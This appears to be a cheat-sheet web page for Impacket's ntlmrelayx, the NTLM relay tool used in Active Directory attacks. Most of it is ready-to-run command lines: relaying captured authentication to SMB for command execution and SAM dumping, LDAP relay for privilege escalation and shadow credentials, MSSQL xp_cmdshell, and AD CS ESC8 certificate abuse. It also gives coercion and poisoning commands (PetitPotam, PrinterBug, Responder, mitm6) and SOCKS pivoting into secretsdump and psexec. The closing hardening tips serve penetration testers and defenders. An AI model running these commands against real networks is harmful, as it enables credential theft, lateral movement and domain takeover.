Salta ai contenuti
1337skills 1337skills - Cheat Sheet

ntlmrelayx

ntlmrelayx is a powerful tool from the Impacket framework that intercepts NTLM authentication and relays it to target services, enabling lateral movement and privilege escalation in Active Directory environments. It eliminates the need for hash cracking by directly using captured credentials against accessible services.

Installation

Sezione intitolata “Installation”

ntlmrelayx comes as part of the Impacket toolkit. Install via pip or from source:

# Install via pip (recommended)
pip install impacket

# Or clone from GitHub and install
git clone https://github.com/fortra/impacket.git
cd impacket
pip install -r requirements.txt
python setup.py install

# Verify installation
ntlmrelayx.py -h

Quick Start

Sezione intitolata “Quick Start”

Basic NTLM relay to SMB target:

# Simple SMB relay (requires captured authentication)
ntlmrelayx.py -t smb://TARGET_IP -smb2support

# With command execution
ntlmrelayx.py -t smb://TARGET_IP -smb2support -c "command here"

# Dump SAM hashes
ntlmrelayx.py -t smb://TARGET_IP -smb2support -e /tmp/shell.exe

Key concept: ntlmrelayx acts as a MITM proxy, capturing NTLM authentication attempts and relaying them to the target service.

Relay Targets

Sezione intitolata “Relay Targets”

Specify which services to relay authentication to:

OptionDescription
-t smb://TARGETSingle SMB target
-t ldap://DCLDAP relay (unencrypted)
-t ldaps://DCLDAP relay (encrypted)
-t mssql://TARGETMSSQL relay
-t http://URLHTTP relay (AD CS, etc.)
-t imap://TARGETIMAP relay
-tf targets.txtFile with multiple targets (one per line)
-tl TARGET_LISTMultiple targets as comma-separated list

Multiple targets enable round-robin relay of captured credentials across several machines.

SMB Relay

Sezione intitolata “SMB Relay”

Relay authentication to SMB and execute commands or dump hashes:

# Basic SMB relay with SMB2 support
ntlmrelayx.py -t smb://192.168.1.50 -smb2support

# Execute command on target
ntlmrelayx.py -t smb://192.168.1.50 -smb2support -c "whoami"

# Execute command (alternative syntax)
ntlmrelayx.py -t smb://192.168.1.50 -smb2support -c "net localgroup administrators"

# Dump SAM hashes
ntlmrelayx.py -t smb://192.168.1.50 -smb2support

# Execute exe from UNC path
ntlmrelayx.py -t smb://192.168.1.50 -smb2support -e C:\\payload.exe

# Interactive shell mode
ntlmrelayx.py -t smb://192.168.1.50 -smb2support -i

# SOCKS proxy for further pivoting
ntlmrelayx.py -t smb://192.168.1.50 -smb2support -socks

SMB2 support (-smb2support) is required for modern Windows targets. Without it, only SMB1 (deprecated) targets can be relayed to.

LDAP Relay

Sezione intitolata “LDAP Relay”

Relay to LDAP for directory enumeration and modifications:

# Basic LDAP relay
ntlmrelayx.py -t ldap://DC_IP -smb2support

# Add computer account to domain
ntlmrelayx.py -t ldap://DC_IP -smb2support --add-computer

# Grant Resource-Based Constrained Delegation (RBCD)
ntlmrelayx.py -t ldap://DC_IP -smb2support --delegate-access

# Escalate user privileges
ntlmrelayx.py -t ldap://DC_IP -smb2support --escalate-user

# Full domain dump (users, groups, OUs)
ntlmrelayx.py -t ldap://DC_IP -smb2support --dump-domain

# Set shadow credentials (Windows 2016+)
ntlmrelayx.py -t ldap://DC_IP -smb2support --shadow-credentials

# LDAPS (encrypted LDAP)
ntlmrelayx.py -t ldaps://DC_IP -smb2support

LDAP relay is powerful for direct domain object modification, enabling rapid privilege escalation without PTH.

MSSQL Relay

Sezione intitolata “MSSQL Relay”

Relay credentials to MSSQL servers for query execution and RCE:

# Basic MSSQL relay
ntlmrelayx.py -t mssql://MSSQL_IP -smb2support

# Execute query
ntlmrelayx.py -t mssql://MSSQL_IP -smb2support -c "SELECT @@version"

# Enable xp_cmdshell and execute OS command
ntlmrelayx.py -t mssql://MSSQL_IP -smb2support -c "EXEC xp_cmdshell 'whoami'"

# Dump database contents
ntlmrelayx.py -t mssql://MSSQL_IP -smb2support -c "SELECT name FROM sys.databases"

HTTP Relay

Sezione intitolata “HTTP Relay”

Relay to HTTP services, especially useful for AD CS web enrollment (ESC8 attack):

# HTTP relay for AD CS Certificate Services
ntlmrelayx.py -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template "User"

# Generic HTTP relay
ntlmrelayx.py -t http://webserver -smb2support

# Specify certificate template
ntlmrelayx.py -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template "Machine"

# Output certificate to file
ntlmrelayx.py -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template "User" -o /tmp/cert.pfx

HTTP relay against AD CS can lead to certificate-based privilege escalation (ESC8).

Multi-Target Relay

Sezione intitolata “Multi-Target Relay”

Relay captured credentials across multiple targets:

# Multiple targets in file (one per line)
echo "192.168.1.50" > targets.txt
echo "192.168.1.51" >> targets.txt
echo "192.168.1.52" >> targets.txt
ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

# Comma-separated targets
ntlmrelayx.py -t smb://192.168.1.50,192.168.1.51,192.168.1.52 -smb2support

# Relay to different services (SMB + LDAP)
ntlmrelayx.py -t smb://192.168.1.50 -t ldap://192.168.1.10 -smb2support

Round-robin targeting distributes captured credentials across multiple machines, increasing impact.

SOCKS Proxy Mode

Sezione intitolata “SOCKS Proxy Mode”

Use relayed connections as a SOCKS proxy for further exploitation:

# Start SOCKS proxy
ntlmrelayx.py -t smb://192.168.1.50 -smb2support -socks

# Listen on custom port (default 1080)
ntlmrelayx.py -t smb://192.168.1.50 -smb2support -socks -socksport 5555

# Use with proxychains
# Add to /etc/proxychains.conf:
# socks5 127.0.0.1 1080

proxychains secretsdump.py -no-pass TARGET_IP
proxychains psexec.py -no-pass DOMAIN/USER@TARGET_IP
proxychains mssqlclient.py -no-pass TARGET_IP

SOCKS mode enables chained attacks where relayed credentials provide access for further exploitation.

Capture vs Relay

Sezione intitolata “Capture vs Relay”

Understanding the attack flow:

# Responder captures NTLM hashes (standalone)
responder -I eth0 -v

# ntlmrelayx actively relays captured auth (active MITM)
ntlmrelayx.py -t smb://target -smb2support

# Combining both for automatic relay:
# Terminal 1: Responder captures and forwards
responder -I eth0 -v

# Terminal 2: ntlmrelayx relays to target
ntlmrelayx.py -t smb://target -smb2support --no-http-server --no-smb-server

# Only relay HTTP/LDAP, let Responder handle LLMNR/MDNS
ntlmrelayx.py -t ldap://dc -smb2support

Direct relay (in-memory) bypasses hash cracking entirely. Captured hashes are never written to disk.

Triggering Authentication

Sezione intitolata “Triggering Authentication”

Common techniques to force authentication toward ntlmrelayx:

# Responder - LLMNR/MDNS/DHCP poisoning
responder -I eth0 -v -w -d

# Coercer - Windows coercion (MS-FSRVP, MS-RPRN, etc.)
coercer -l attacker_ip -t target_ip

# PetitPotam - ADCS HTTP coercion
python3 petitpotam.py -u username -p password attacker_ip target_ip

# PrinterBug - force print server to authenticate
python3 printerbug.py domain/user:pass@target attacker_ip

# mitm6 - IPv6 DHCP poisoning
mitm6 -d domain.local

# WPAD attack
ntlmrelayx.py -t http://target -smb2support --wh attacker_ip

Combine auth triggers with ntlmrelayx for complete exploitation chains.

IPv6 Attacks

Sezione intitolata “IPv6 Attacks”

Leverage IPv6 DHCP poisoning with mitm6:

# Terminal 1: mitm6 poisons DHCPv6
mitm6 -d domain.local

# Terminal 2: ntlmrelayx relays captured auth
ntlmrelayx.py -t ldap://dc.domain.local -smb2support --dump-domain

# Alternative: Relay to SMB
ntlmrelayx.py -t smb://server.domain.local -smb2support

IPv6 is often overlooked, making DHCPv6 spoofing effective even when IPv4 is hardened.

Advanced Options

Sezione intitolata “Advanced Options”

Fine-tune ntlmrelayx behavior:

# Remove MIC (Message Integrity Check) for older Windows
ntlmrelayx.py -t smb://target -smb2support --remove-mic

# Disable SMB server (relay-only mode)
ntlmrelayx.py -t ldap://dc --no-smb-server --no-http-server

# Disable HTTP server
ntlmrelayx.py -t smb://target -smb2support --no-http-server

# Custom WPAD hostname
ntlmrelayx.py -t smb://target -smb2support -wh wpad.domain.local

# Specify relay port
ntlmrelayx.py -t smb://target -smb2support -rp 8080

# Output file (for certain modules)
ntlmrelayx.py -t ldap://dc -smb2support -o output.txt

# Dump LAPS password
ntlmrelayx.py -t ldap://dc -smb2support --dump-laps

# Domain authentication for relay
ntlmrelayx.py -t ldap://dc -smb2support -domain domain.local

Troubleshooting

Sezione intitolata “Troubleshooting”

Issue: “Connection refused” or “target unreachable”

  • Verify network connectivity and firewall rules
  • Check target IP address and service port (445 for SMB, 389/636 for LDAP)
  • Ensure SMB2 support enabled with -smb2support

Issue: “NTLM auth failed” or “relay not triggered”

  • Confirm authentication is being sent toward ntlmrelayx (use Responder or Coercer)
  • Check that the relayed user has permissions on target
  • Verify network is positioned for MITM (LLMNR poisoning with Responder)

Issue: Command execution fails

  • Ensure relayed account has admin or Execute permissions
  • Use -i for interactive shell instead of -c for one-off commands
  • Test connectivity manually first: secretsdump.py -no-pass target_ip

Issue: SOCKS proxy not working

  • Verify ntlmrelayx is running with -socks flag
  • Check proxychains config points to correct localhost:1080
  • Ensure relayed user has permissions for intended operations

Issue: “Signature verification failed”

  • Target may enforce SMB signing; try --remove-mic flag
  • Some exploits incompatible with signed SMB; consider different target

Best Practices

Sezione intitolata “Best Practices”
  • Always obtain authorization before testing NTLM relay in any environment
  • Use network segmentation: NTLM relay requires MITM position; hardened networks mitigate this
  • Monitor for exploitation: High-volume failed authentication attempts may indicate attacks
  • Disable LLMNR/MDNS: Set HKLM\Software\Policies\Microsoft\Windows NT\DNSClient\EnableMulticast = 0
  • Enable SMB signing: Enforce SMB signing on all servers (Group Policy)
  • Require EPA: Enable Extended Protection for Authentication (EPA)
  • Segment LDAP: Restrict LDAP access via firewall and credentials
  • Monitor outbound NTLM: Alert on NTLM auth relayed to unexpected services
  • Patch promptly: Keep Windows and services updated to patch relay vectors
Sezione intitolata “Related Tools”
ToolPurpose
ResponderLLMNR/mDNS/DHCP poisoning to capture NTLM
CoercerForce Windows coercion (MS-FSRVP, MS-RPRN)
mitm6IPv6 DHCP poisoning for WPAD attacks
krbrelayxKerberos relay attacks (similar to NTLM relay)
CertipyActive Directory Certificate Services enumeration/abuse
PetitPotamADCS HTTP coercion via MS-EFSRPC
proxychainsRoute traffic through SOCKS proxy for pivoting
secretsdumpDump credentials via NTLM relay or pass-the-hash